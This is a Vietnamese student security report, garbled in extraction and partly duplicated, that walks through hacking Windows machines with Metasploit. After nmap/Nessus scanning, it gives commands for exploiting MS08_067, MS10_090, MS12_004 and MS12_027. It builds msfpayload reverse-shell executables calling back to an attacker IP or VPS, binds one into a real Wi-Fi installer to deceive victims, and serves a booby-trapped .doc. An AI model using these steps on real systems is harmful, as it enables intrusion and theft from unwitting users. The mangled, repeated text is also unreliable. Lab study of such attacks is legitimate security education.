khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
